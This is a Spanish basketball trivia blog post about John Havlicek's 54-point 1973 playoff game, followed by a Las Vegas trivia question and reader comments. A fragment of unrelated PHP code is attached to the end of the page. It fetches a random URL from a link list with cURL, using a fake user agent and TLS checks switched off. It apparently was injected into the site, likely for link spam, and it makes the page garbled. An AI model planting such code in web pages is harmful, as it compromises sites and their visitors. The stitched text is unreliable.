Trivial #22: John “Hondo” Havlicek

31 de January de 2010 por TheDeerHunter

Nos merecemos un coscorrón por marearos injustificadamente. Aceptamos las culpas y proclamamos a Heineken como ganador del anterior trivial y es que el protagonista que buscábamos era Hondo de John Wayne. La peli de 1953 no tuvo en su día excesivo éxito sobretodo en su versión 3-D que sólo pudo visualizarse en 3 ciudades de los USA por su concepción bastante extraña, nada que ver con la tecnología que ha aplicado ahora Cameron. Trata de un correo de la caballería “mitad indio” que se queda solo defendiendo la finca de la damisela de turno ante un brutal ataque de los apaches. Más allá de las referencias a la testosterona del personaje con respecto a lo que conocemos de Havlicek, el parecido con John Wayne resulta, como mínimo, bastante curioso.

El récord al que nos referimos está fechado en 1973. En el 1er partido de la serie Celtics vs Hawks, sin línea de 3 todavía, Havlicek acribilló a los Hawks con 54 puntos. Esta marca no nos diría demasiado de no haber sido conseguida a partir de una serie de lanzamientos de 24 canastas de 36 intentos. Hemos de confesar que la mención en la pregunta al “récord que muy posiblemente jamás nadie superará mientras vivamos” venía a colación de que un servidor tenía erróneamente entendido que era sobre una serie ¡de 26 tiros!, algo que me parecía especialmente sobrenatural (y tanto que lo era).

De todas formas, tras casi 40 años desde aquella fecha, han pasado por nuestras vidas gente como Iverson, Jordan, Kobe (con sus 81 incluidos), Bird, LeBron, Shaq, Malone, Barkley… y de ellos nadie ha logrado superar esa marca. Así que podemos decir que en efecto se trata de un récord que difícilmente veamos superar en toda nuestra vida. Se le acercaron Barkley en el 94, con 23 canastas (de 31 intentos) y Jordan con 22 (de 35) en el 97.Lo más curioso de todo esto es la excasa popularidad que tiene Havlicek incluso entre los más fieles seguidores de los Celtics y su fama de especialista defensivo o de escudero. Lo correcto sería decir que era un especialista de lo que le pidieran hacer, ya fuera defender, anotar o dirigir, y que de escudero tenía poco. Nadie debería poder poner en duda que es uno de los mejores de todos los tiempos. Fundamental en nada menos que 8 anillos. Se dice pronto.

Nueva pregunta:

De todos es sabido que Las Vegas no dispone de franquicia NBA pero curiosamente en esa ciudad se disputó uno de esos partidos que jamás serán olvidados por los aficionados de la NBA. ¿A qué partido nos referimos? Venga, que es muy fácil.

Comenta

7 comentarios a esta entrada

  1. Carlos dice:
    #1

    All star week end 2008

      Citar

  2. Carlos dice:
    #2

    Perdón, 2007

      Citar

  3. sergio dice:
    #3

    joe… y tanto que era facil xD

      Citar

  4. Txusma dice:
    #4

    No os parece demasiado obvio?

    Os aseguro que el partido al que nos referimos es 50 veces más importante que aquel All-Stars…

      Citar

  5. rojorob dice:
    #5

    Ajá, esta sí la sé. El partido Jazz-Lakers en el que Kareem batió el récord de puntos de Chamberlain.

      Citar

  6. sergio dice:
    #6

    Am…. pues mira… esa no tenia ni idea de que hubiera sido en Las Vegas, y mira que he visto la jugada varias veces

      Citar

  7. sergio dice:
    #7

    Parece incluso mas importante que la liga de verano de Las Vegas xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>